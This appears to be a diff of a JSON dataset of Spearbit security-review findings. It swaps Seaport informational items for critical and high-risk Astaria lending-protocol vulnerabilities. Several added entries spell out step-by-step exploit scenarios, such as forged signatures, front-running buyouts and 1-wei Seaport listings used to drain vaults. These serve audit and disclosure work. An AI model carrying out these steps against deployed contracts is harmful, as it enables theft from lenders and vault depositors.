"https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The issue stems from the following check in VaultImplementation._validateCommitment(params, receiver): if ( msg.sender != holder && receiver != holder && receiver != operator && !ROUTER().isValidVault(receiver) // <-- the problematic condition ) { ... In this if block if receiver is a valid vault the body of the if is skipped. A valid vault is one that has been registered in AstariaRouter using newVault or newPublicVault. So for example any supplied private vault as a receiver would be allowed here and the call to _validateCommitment will continue without reverting at least in this if block. If we backtrack function calls to _validateCommitment, we arrive to 3 exposed endpoints: commitToLiens buyoutLien commitToLien A call to commitToLiens will end up having the receiver be the AstariaRouter. A call to buyoutLien will set the receiver as the recipient() for the vault which is either the vault itself for public vaults or the owner for private vaults. So we are only left with commitToLien, where the caller can set the value for the receiver directly. 8 A call to commitToLien will initiate a series of function calls, and so receiver is only supplied to _validateCommit- ment to check whether it is allowed to be used and finally when transferring safeTransfer) wETH. This opens up exploiting scenarios where an attacker: 1. Creates a new private vault by calling newVault, let's call it V . 2. Takes a valid commitment C and combines it with V and supply those to commitToLien. 3. Calls withdraw endpoint of V to withdraw all the funds. For step 2. the attacker can source valid commitments by doing either of the following: 1. Frontrun calls to commitToLiens and take all the commitments C0, (cid:1) (cid:1) (cid:1) , Cn and supply them one by one along with V to commitToLien endpoint of the vault that was specified by each Ci . 2. Frontrun calls to commitToLien endpoints of vaults, take their commitment C and combine it with V to send to commitToLien. 3. Backrun the either scenarios from the above points and create a new commitment with new lien request that tries to max out the potential debt for a collateral while also keeping other inequalities valid (for example, the inequality regarding liquidationInitialAsk).", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "recipient is provided as the fulfiller for the OrderFulfilled event", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In the above context in general it is not true that the recipient is the fulfiller. Also note that recipient is address(0) for match orders.", + "title": "Collateral owner can steal funds by taking liens while asset is listed for sale on Seaport", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "We only allow collateral holders to call listForSaleOnSeaport if they are listing the collateral at a price that is sufficient to pay back all of the liens on their collateral. When a new lien is created, we check that collateralStateHash != bytes32(\"ACTIVE_AUCTION\") to ensure that the collateral is able to accept a new lien. However, calling listForSaleOnSeaport does not set the collateralStateHash, so it doesn't stop us from taking new liens. As a result, a user can deposit collateral and then, in one transaction: List the asset for sale on Seaport for 1 wei. Take the maximum possible loans against the asset. Buy the asset on Seaport for 1 wei. The 1 wei will not be sufficient to pay back the lenders, and the user will be left with the collateral as well as the loans (minus 1 wei).", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "availableOrders[i] return values need to be explicitly assigned since they live in a region of memory which might have been dirtied before", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Seaport 1.1 did not have the following default assignment: if (advancedOrder.numerator == 0) { availableOrders[i] = false; continue; } But this is needed here since the current memory region which was previously used by the accumulator might be dirty.", + "title": "validateStack allows any stack to be used with collateral with no liens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The validateStack modifier is used to confirm that a stack entered by a user matches the stateHash in storage. However, the function reverts under the following conditions: if (stateHash != bytes32(0) && keccak256(abi.encode(stack)) != stateHash) { revert InvalidState(InvalidStates.INVALID_HASH); } The result is that any collateral with stateHash == bytes32(0) (which is all collateral without any liens taken against it yet) will accept any provided stack as valid. This can be used in a number of harmful ways. Examples of vulnerable endpoints are: createLien: If we create the first lien but pass a stack with other liens, those liens will automatically be included in the stack going forward, which means that the collateral holder will owe money they didn't receive. makePayment: If we make a payment on behalf of a collateral with no liens, but include a stack with many liens (all owed to me), the result will be that the collateral will be left with the remaining liens continuing to be owed buyoutLien: Anyone can call buyoutLien(...) and provide parameters that are spoofed but satisfy some constraints so that the call would not revert. This is currently possible due to the issue in this context. As a consequence the caller can _mint any unminted liens which can DoS the system. _burn lienIds that they don't have the right to remove. manipulate any public vault's storage (if it has been set as a payee for a lien) through its handleBuyout- Lien. It seems like this endpoint might have been meant to be a restricted endpoint that only registered vaults can call into. And the caller/user is supposed to only call into here from VaultImplementa- tion.buyoutLien.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "Usage of MemoryPointer / formatting inconsistent in _getGeneratedOrder", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Usage of MemoryPointer / formatting is inconsistent between the loop used OfferItems and the loop used for ConsiderationItems.", + "title": "A borrower can list their collateral on Seaport and receive almost all the listing price without paying back their liens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When the collateral s.auctionData is not populated and thus, function gets called since stack.length is 0, this loop will not run and no payment is sent to the lending vaults. The rest of the payment is sent to the borrower. And the collateral token and its related data gets burnt/deleted by calling settleAuction. The lien tokens and the vaults remain untouched as though nothing has happened. is listed on SeaPort by the borrower using listForSaleOnSeaport, if that order gets fulfilled/matched and ClearingHouse's fallback So basically a borrower can: 1. Take/borrow liens by offering a collateral. 2. List their collateral on SeaPort through the listForSaleOnSeaport endpoint. 3. Once/if the SeaPort order fulfills/matches, the borrower would be paid the listing price minus the amount sent to the liquidator (address(0) in this case, which should be corrected). 4. Collateral token/data gets burnt/deleted. 5. Lien token data remains and the loans are not paid back to the vaults. And so the borrower could end up with all the loans they have taken plus the listing price from the SeaPort order. Note that when a user lists their own collateral on Seaport, it seems that we intentionally do not kick off the auction process: Liens are continued. Collateral state hash is unchanged. liquidator isn't set. Vaults aren't updated. Withdraw proxies aren't set, etc. Related issue 88.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "newAmount is not used in _compareItems", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "newAmount is unused in _compareItems. If originalItem points to I = (t, T , i, as, ae) and the newItem to Inew = (t 0, T 0, i 0, a0 s, a0 e) where parameter description t 0 t T , T 0 i 0 i as, a0 s ae, a0 e c then we have itemType itemType for I after the adjustment for restricted collection items token identifierOrCriteria identifierOrCriteria for I after the adjustment for restricted collection items startAmount endAmount _compareItems c(I, Inew ) = (t 6= t 0) _ (T 6= T 0) _ (i 6= i 0) _ (as 6= ae) and so we are not comparing either as to a0 enforced. In _getGeneratedOrder we have the following check: as > a0 errorBuffer. inequality is reversed for consideration items). And so in each loop (t 6= t 0) _ (T 6= T 0) _ (i 6= i 0) _ (as 6= ae) _ (as > a0 s or a0 s to a0 e. In abi_decode_generateOrder_returndata a0 s = a0 e is s (invalid case for offer items that contributes to s) is ored to errorBuffer.", + "title": "Phony signatures can be used to forge any strategy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In _validateCommitment(), we check that the merkle root of the strategy has been signed by the strategist or delegate. After the signer is recovered, the following check is performed to validate the signature: recovered != owner() && recovered != s.delegate && recovered != address(0) 11 This check seems to be miswritten, so that any time recovered == address(0), the check passes. When ecrecover is used to check the signed data, it returns address(0) in the situation that a phony signature is submitted. See this example for how this can be done. The result is that any borrower can pass in any merkle root they'd like, sign it in a way that causes address(0) to return from ecrecover, and have their commitment validated.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "reformat validate so that its body is consistent with the other external functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "For consistency with other functions we can rewrite validate as: function validate( Order[] calldata /* orders */ ) external override returns (bool /* validated */ ) { return _validate(to_dyn_array_Order_ReturnType( abi_decode_dyn_array_Order )(CalldataStart.pptr())); } Needs to be checked if it changes code size or gas cost. Seaport: Fixed in PR 824. Spearbit: Verified.", + "title": "Inequalities involving liquidationInitialAsk and potentialDebt can be broken when buyoutLien is called", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When we commit to a new lien, the following gets checked to be true for all j 2 0, (cid:1) (cid:1) (cid:1) , n (cid:0) 1: onew + on(cid:0)1 + (cid:1) (cid:1) (cid:1) + oj (cid:20) Lj where: parameter description oi onew n Li L0 k k A0 k _getOwed(newStack[i], newStack[i].point.end) _getOwed(newSlot, newSlot.point.end) stack.length newStack[i].lien.details.liquidationInitialAsk params.encumber.lien.details.liquidationInitialAsk params.position params.encumber.amount 12 so in a stack in general we should have the: But when an old lien is replaced with a new one, we only perform the following checks for L0 k : (cid:1) (cid:1) (cid:1) + oj+1 + oj (cid:20) Lj 0 0 0 k ^ L k (cid:21) A L k > 0 And thus we can introduce: L0 o0 k (cid:28) Lk or k (cid:29) ok (by pushing the lien duration) which would break the inequality regarding oi s and Li . If the inequality is broken, for example, if we buy out the first lien in the stack, then if the lien expires and goes into a Seaport auction the auction's starting price L0 would not be able to cover all the potential debts even at the beginning of the auction.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Add commented parameter names (Type Location /* name */)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Add commented parameter names (Type Location /* name */) for validate: Order[] calldata /* orders */ Seaport: Fixed in commit 74de34. Spearbit: Verified.", + "title": "VaultImplementation.buyoutLien can be DoSed by calls to LienToken.buyoutLien (cid:1) (cid:1) (cid:1) + oj+1 + oj (cid:20) Lj", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Anyone can call into LienToken.buyoutLien and provide params of the type LienActionBuyout: params.incoming is not used, so for example vault signatures or strategy validation is skipped. There are a few checks for params.encumber. Let's define the following variables: parameter value i kj tj ej e0 i lj l 0 i rj r 0 i c params.position params.encumber.stack[j].point.position params.encumber.stack[j].point.last params.encumber.stack[j].point.end tnow + D0 i params.encumber.stack[j].point.lienId i )) where h is the keccak256 of the encoding i , r 0 i , c0 i , S0 i , D0 i , V 0 i , (A0max h(N 0 i , P 0 i , L0 params.encumber.stack[j].lien.details.rate : old rate params.encumber.lien.details.rate : new rate params.encumber.collateralId 13 parameter value cj c0 i Aj A0 i Amax j A0max i R Nj N 0 i Vj V 0 i Sj S0 i Dj D0 i Pj P0 i Lj L0 i Imin Dmin tnow bi o oj n params.encumber.stack[j].lien.collateralId params.encumber.lien.collateralId params.encumber.stack[j].point.amount params.encumber.amount params.encumber.stack[j].lien.details.maxAmount params.encumber.lien.details.maxAmount params.encumber.receiver params.encumber.stack[j].lien.token params.encumber.lien.token params.encumber.stack[j].lien.vault params.encumber.lien.vault params.encumber.stack[j].lien.strategyRoot params.encumber.lien.strategyRoot params.encumber.stack[j].lien.details.duration params.encumber.lien.details.duration params.encumber.stack[j].lien.details.maxPotentialDebt params.encumber.lien.details.maxPotentialDebt params.encumber.stack[j].lien.details.liquidationInitialAsk params.encumber.lien.details.liquidationInitialAsk AstariaRouter.s.minInterestBPS AstariaRouter.s.minDurationIncrease block.timestamp buyout _getOwed(params.encumber.stack[params.position], block.timestamp) _getOwed(params.encumber.stack[j], params.encumber.stack[j].point.end) params.encumber.stack.length O = o0 + o1 + (cid:1) (cid:1) (cid:1) + on(cid:0)1 _getMaxPotentialDebtForCollateral(params.encumber.stack) sj s0 i params.encumber.stack[j] newStack Let's go over the checks and modifications that buyoutLien does: 1. validateStack is called to make sure that the hash of params.encumber.stack matches with s.collateralStateHash value of c. This is not important and can be bypassed by the exploit even after the fix for Issue 106. 2. _createLien is called next which does the following checks: 2.1. c is not up for auction. 2.2. We haven't reached max number of liens, currently set to 5. 2.3. L0 > 0 2.4. If params.encumber.stack is not empty then c0 i , (A0max i , L0 i )) where h is the hashing mechanism of encoding and then taking the keccak256. 2.6 The new stack slot and i = c0 2.5. We _mint a new lien for R with id equal to h(N 0 i and L0 i (cid:21) A0 i , V 0 i , D0 i , S0 i , P 0 i , c0 , r 0 i i 14 the new lien id is returned. 3. isValidRefinance is called which performs the following checks: 3.1. checks c0 i = c0 3.2. checks either or (r 0 i < ri (cid:0) Imin) ^ (e0 i (cid:21) ei ) i i (cid:20) ri ) ^ (e0 (r 0 is in auction by checking s.collateralStateHash's value. i (cid:21) ei + Dmin) 4. check where c0 i 5. check O (cid:20) P0 i . 6. check A0max (cid:21) o. 7. send wETH through TRANSFER_PROXY from msg.sender to payee of li with the amount of bi . 8. if payee of li is a public vault, do some book keeping by calling handleBuyoutLien. 9. call _replaceStackAtPositionWithNewLien to: 9.1. replace si with s0 9.2. _burn li . 9.3. delete s.lienMeta of li . i in params.encumber.stack. So in a nutshell the important checks are: c, ci are not in auction (not important for the exploit) c0 i = c0 i and L0 n is less than or equal to max number of allowed liens ( 5 currently) (not important for the exploit) L0 i (cid:21) A0 O (cid:20) P0 i A0max i > 0 (cid:21) o i or (r 0 i < ri (cid:0) Imin) ^ (e0 i (cid:21) ei ) i (cid:20) ri ) ^ (e0 (r 0 i (cid:21) ei + Dmin) Exploit An attacker can DoS the VaultImplementation.buyoutLien as follows: 1. A vault decides to buy out a collateral's lien to offer better terms and so signs a commitment and some- one on behalf of the vault calls VaultImplementation.buyoutLien which if executed would call LienTo- ken.buyoutLien with the following parameters: 15 LienActionBuyout({ incoming: incomingTerms, position: position, encumber: ILienToken.LienActionEncumber({ collateralId: collateralId, amount: incomingTerms.lienRequest.amount, receiver: recipient(), lien: ROUTER().validateCommitment({ commitment: incomingTerms, timeToSecondEpochEnd: _timeToSecondEndIfPublic() }), stack: stack }) }) 2. The attacker fronrun the call from step 1. and instead provide the following modified parameters to LienTo- ken.buyoutLien LienActionBuyout({ incoming: incomingTerms, // not important, since it is not used and can be zeroed-out to save tx gas position: position, encumber: ILienToken.LienActionEncumber({ collateralId: collateralId, amount: incomingTerms.lienRequest.amount, receiver: msg.sender, // address of the attacker lien: ILienToken.Lien({ // note that the lien here would have the same fields as the original message by the vault rep. ,! token: address(s.WETH), vault: incomingTerms.lienRequest.strategy.vault, // address of the vault offering a better term strategyRoot: incomingTerms.lienRequest.merkle.root, collateralId: collateralId, details: details // see below }), stack: stack }) }) Where details provided by the attacker can be calculated by using the below snippet: uint8 nlrType = uint8(_sliceUint(commitment.lienRequest.nlrDetails, 0)); (bytes32 leaf, ILienToken.Details memory details) = IStrategyValidator( s.strategyValidators[nlrType] ).validateAndParse( commitment.lienRequest, s.COLLATERAL_TOKEN.ownerOf( commitment.tokenContract.computeId(commitment.tokenId) ), commitment.tokenContract, commitment.tokenId ); The result is that: The newLienId that was supposed to be _minted for the recipient() of the vault, gets minted for the at- tacker. The call to VaultImplementation.buyoutLien would fail, since the newLienId is already minted, and so the vault would not be able to receives the interests it had anticipated. When there is a payment or Seaport auction settlement, the attacker would receive the funds instead. 16 The attacker can intorduces a malicous contract into the protocol ken.ownerOf(newLienId) without needing to register for a vault. that would be LienTo- To execute this attack, the attacker would need to spend the buyout amount of assets. Also the attacker does not necessarily need to front run a transaction to buyout a lien. They can pick their own hand-crafted parameters that would satisfy the conditions in the analysis above to introduce themselves in the protocol.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Document that the height provided to _lookupBulkOrderTypehash can only be in a certain range", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Need to have height h provided to _lookupBulkOrderTypehash such that: 1 + 32(h (cid:0) 1) 2 [0, min(0xffffffffffffffff, typeDirectory.codesize) (cid:0) 32] Otherwise typeHash := mload(0) would be 0 or would be padded by zeros. When extcodecopy gets executed extcodecopy(directory, 0, typeHashOffset, 0x20) clients like geth clamp typehashOffset to minimum of 0xffffffff_ffffffff and directory.codesize and pads the result with 0s if out of range. ref: instructions.go#L373 62 common.go#L54", + "title": "VaultImplementation.buyoutLien does not update the new public vault's parameters and does not transfer assets between the vault and the borrower", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "VaultImplementation.buyoutLien does not update the accounting for the vault (if it's public). The slope, yIntercept, and s.epochData[...].liensOpenForEpoch (for the new lien's end epoch) are not updated. They are updated for the payee of the swapped-out lien if the payee is a public vault by calling handleBuyoutLien. Also, the buyout amount is paid out by the vault itself. The difference between the new lien amount and the buyout amount is not worked out between the msg.sender and the new vault.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Unused imports can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The imported contents in this context are unused.", + "title": "setPayee doesn't update y intercept or slope, allowing vault owner to steal all funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When setPayee() is called, the payment for the lien is no longer expected to go to the vault. How- ever, this change doesn't impact the vault's y-intercept or slope, which are used to calculate the vault's totalAs- sets(). This can be used maliciously by a vault owner to artificially increase their totalAssets() to any arbitrary amount: Create a lien from the vault. SetPayee to a non-vault address. Buyout the lien from another vault (this will cause the other vault's y-int and slope to increase, but will not impact the y-int and slope of the original vault because it'll fail the check on L165 that payee is a public vault. Repeat the process again going the other way, and repeat the full cycle until both vault's have desired totalAssets(). For an existing vault, a vault owner can withdraw a small amount of assets each epoch. If, in any epoch, they are one of the only users withdrawing funds, they can perform this attack immediately before the epoch is pro- cessed. The result is that the withdrawal shares will by multiplied by totalAssets() / totalShares() to get the withdrawal rate, which can be made artificially high enough to wipe out the entire vault.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "msg.sender is provided as the fulfiller input parameter in a few locations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "msg.sender is provided as the fulfiller input parameter.", + "title": "settleAuction() doesn't check if the auction was successful", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "settleAuction() is a privileged functionality called by LienToken.payDebtViaClearingHouse(). settleAuction() is intended to be called on a successful auction, but it doesn't verify that that's indeed the case. Anyone can create a fake Seaport order with one of its considerations set as the CollateralToken as described in Issue 93. Another potential issue is if the Seaport orders can be \"Restricted\" in future, then there is a possibility for an authorized entity to force settleAuction on CollateralToken, and when SeaPort tries to call back on the zone to validate it would fail.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Differences and similarities of ConsiderationDecoder and solc when decoding dynamic arrays of static/fixed base struct type", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The way OfferItem[] in abi_decode_dyn_array_OfferItem and ConsiderationItem[] in abi_- decode_dyn_array_ConsiderationItem are decoded are consistent with solc regarding this: For dynamic arrays of static/fixed base struct type, the memory region looks like: 63 [mPtrLength --------------------------------------------------- [mPtrLength + 0x20: mPtrLength + 0x40) : mPtrLength + 0x20) arrLength memberTail1 - a memory pointer to the array's 1st element ,! ... [mPtrLength + ...: mPtrLength + ...) memberTailN - a memory pointer to the array's Nth element ,! --------------------------------------------------- [memberTail1 ... [memberTailN : memberTailN + ) elementN : memberTail1 + ) element1 The difference is solc decodes and validates (checking dirty bytes) each field of the elements of the array (which are static struct types) separately (one calldataload and validation per field per element). ConsiderationDecoder skips all those validations for both OfferItems[] and ConsiderationItems[] by copying a chunk of calldata to memory (the tail parts): calldatacopy( mPtrTail, add(cdPtrLength, 0x20), mul(arrLength, OfferItem_size) ) That means for OfferItem[], itemType and token (and also recipient for ConsiderationItem[]) fields can potentially have dirty bytes.", + "title": "Incorrect auction end validation in liquidatorNFTClaim()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "liquidatorNFTClaim() does the following check to recognize that Seaport auction has ended: if (block.timestamp < params.endTime) { //auction hasn't ended yet revert InvalidCollateralState(InvalidCollateralStates.AUCTION_ACTIVE); } Here, params is completely controlled by users and hence to bypass this check, the caller can set params.endTime to be less than block.timestamp. Thus, a possible exploit scenario occurs when AstariaRouter.liquidate() is called to list the underlying asset on Seaport which also sets liquidator address. Then, anyone can call liquidatorNFTClaim() to transfer the underlying asset to liquidator by setting params.endTime < block.timestamp.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "PointerLibraries's malloc skips some checks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "malloc in PointerLibraries skips checking if add(mPtr, size) is OOR or wraps around. Solidity does the following when allocating memory: 64 function allocate_memory(size) -> memPtr { memPtr := allocate_unbounded() finalize_allocation(memPtr, size) } function allocate_unbounded() -> memPtr { memPtr := mload() } function finalize_allocation(memPtr, size) { let newFreePtr := add(memPtr, round_up_to_mul_of_32(size)) // protect against overflow if or(gt(newFreePtr, 0xffffffff_ffffffff), lt(newFreePtr, memPtr)) { // <-- the check that is skipped panic_error_() } mstore(, newFreePtr) } function round_up_to_mul_of_32(value) -> result { result := and(add(value, 31), not(31)) } function panic_error_() { // = cast sig \"Panic(uint256)\" mstore(0, ) mstore(4, ) revert(0, 0x24) } Also note, rounding up the size to the nearest word boundary is hoisted out of malloc.", + "title": "Typed structured data hash used for signing commitments is calculated incorrectly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Since STRATEGY_TYPEHASH == keccak256(\"StrategyDetails(uint256 nonce,uint256 deadline,bytes32 root)\") The hash calculated in _encodeStrategyData is incorrect according to EIP-712. s.strategistNonce is of type uint32 and the nonce type used in the type hash is uint256. Also the struct name used in the typehash collides with StrategyDetails struct name defined as: 19 struct StrategyDetails { uint8 version; uint256 deadline; address vault; }", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "abi_decode_bytes can populate memory with dirty bytes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When abi_decode_bytes decodes bytes, it rounds its size and copies the rounded size from calldata to memory. This memory region might get populated with dirty bytes. So for example: For both signature and extraData we are using abi_decode_bytes. If the AdvancedOrder is tightly packed and: If signature's length is not a multiple of a word (0x20) part of the extraData.length bytes will be copied/duplicated to the end of signature's last memory slot. If extraData's length is not a multiple of a word (0x20) part of the calldata that comes after extraData's tail will be copied to memory. Even if AdvancedOrder is not tightly packed (tail offsets are multiple of a word relative to the head), the user can stuff the calldata with dirty bits when signature's or extraData's length is not a multiple of a word. And those dirty bits will be carried over to memory during decoding. Note, these extra bits will not be overridden or 65 cleaned during the decoding because of the way we use and update the free memory pointer (incremented by the rounded-up number to a multiple of a word).", + "title": "makePayment doesn't properly update stack, so most payments don't pay off debt", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "As we loop through individual payment in _makePayment, each is called with: (newStack, spent) = _payment( s, stack, uint8(i), totalCapitalAvailable, address(msg.sender) ); This call returns the updated stack as newStack but then uses the function argument stack again in the next iteration of the loop. The newStack value is unused until the final iterate, when it is passed along to _updateCollateralStateHash(). This means that the new state hash will be the original state with only the final loan repaid, even though all other loans have actually had payments made against them.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "abi_encode_validateOrder reuses a memory region", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "It is really important to note that before abi_encode_validateOrder is called, _prepareBasicFul- fillmentFromCalldata(...) needs to be called to populate the memory region that is used for event OrderFul- filled(...) which can be reused/copied in this function: MemoryPointer.wrap(offerDataOffset).copy( dstHead.offset(tailOffset), offerAndConsiderationSize ); From when the memory region for OrderFulfilled(...) is populated till we reach this point, care needs to be taken to not modified that region. accumulator data is written to the memory after that region and the current implementation does not touch that region during the whole call after the event has been emitted.", + "title": "_removeStackPosition() always reverts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "removeStackPosition() always reverts since it calls stack array for an index beyond its length: for (i; i < length; ) { unchecked { newStack[i] = stack[i + 1]; ++i; } } Notice that for i==length-1, stack[length] is called. This reverts since length is the length of stack array. Additionally, the intention is to delete the element from stack at index position and shift left the elements ap- pearing after this index. However, an addition increment to the loop index i results in newStack[position] being empty, and the shift of other elements doesn't happen.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "abi_encode_validateOrder writes to a memory region that might have been potentially dirtied by accumulator", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In abi_encode_validateOrder potentially (in the future), we might be writing in an area where accumulator was used. And since the book-keeping for the accumulator does not update the free memory pointer, we need to make sure all bytes in the memory in the range [dst, dst+size) are fully updated/written to in this function.", + "title": "Refactor _paymentAH()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_paymentAH() has several vulnerabilities: stack is a memory parameter. So all the updates made to stack are not applied back to the corresponding storage variable. No need to update stack[position] as it's deleted later. decreaseEpochLienCount() is always passed 0, as stack[position] is already deleted. Also decreaseEp- ochLienCount() expects epoch, but end is passed instead. This if/else block can be merged. updateAfterLiquidationPayment() expects msg.sender to be LIEN_- TOKEN, so this should work.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Reorder writing to memory in ConsiderationEncoder to follow the order in struct definitions.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Reorder the memory writes in ConsiderationEncoder to follow the order in struct definitions.", + "title": "processEpoch() needs to be called regularly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "If the processEpoch() endpoint does not get called regularly (especially close to the epoch bound- aries), the updated currentEpoch would lag behind the actual expected value and this will introduce arithmetic errors in formulas regarding epochs and timestamps.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" + ] + }, + { + "title": "Can create lien for collateral while at auction by passing spoofed data", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In the createLien function, we check that the collateral isn't currently at auction before giving a lien with the following check: if ( s.collateralStateHash[params.collateralId] == bytes32(\"ACTIVE_AUCTION\") ) { revert InvalidState(InvalidStates.COLLATERAL_AUCTION); } However, collateralId is passed in multiple places in the params: params.encumber.lien. both in params directly and in 23 The params.encumber.lien.collateralId is used everywhere else, and is the final value that is used. But the check is performed on params.collateralId. As a result, we can set the following: params.encumber.lien.collateralId: collateral that is at auction. params.collateralId: collateral not at auction. This will allow us to pass this validation while using the collateral at auction for the lien.", + "labels": [ + "Spearbit", + "Astaria", + "Severity: High Risk" ] }, { - "title": "The compiled YUL code includes redundant consecutive validation of enum types", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Half the location where an enum type struct field has been used/accessed, the validation function for this enum type is performed twice: validator_assert_enum_(memPtr) validator_assert_enum_(memPtr)", + "title": "stateHash isn't updated by buyoutLien function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "We never update the collateral state hash anywhere in the buyoutLien function. As a result, once all checks are passed, payment will be transferred from the buyer to the seller, but the seller will retain ownership of the lien in the system's state.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Consider writing tests for revert functions in ConsiderationErrors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "ConsiderationErrors.sol is a new file and is untested. Writing test cases to make sure the revert functions are throwing the right errors is an easy way to prevent mistakes.", + "title": "If a collateral's liquidation auction on Seaport ends without a winning bid, the call to liquidatorN- FTClaim does not clear the related data on LienToken's side and also for payees that are public vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "If/when a liquidation auction ends without being fulfilled/matched on Seaport and afterward when the current liquidator calls into liquidatorNFTClaim, the storage data (s.collateralStateHash, s.auctionData, s.lienMeta) on the LienToken side don't get reset/cleared and also the lien token does not get burnt. That means: s.collateralStateHash[collateralId] stays equal to bytes32(\"ACTIVE_AUCTION\"). s.auctionData[collateralId] will have the past auction data. s.lienMeta[collateralId].atLiquidation will be true. That means future calls to commitToLiens by holders of the same collateral will revert.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Typo in comment for the selector used in ConsiderationEncoder.sol#abi_encode_validateOrder()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Minor typo in comments: // Write ratifyOrder selector and get pointer to start of calldata dst.write(validateOrder_selector);", 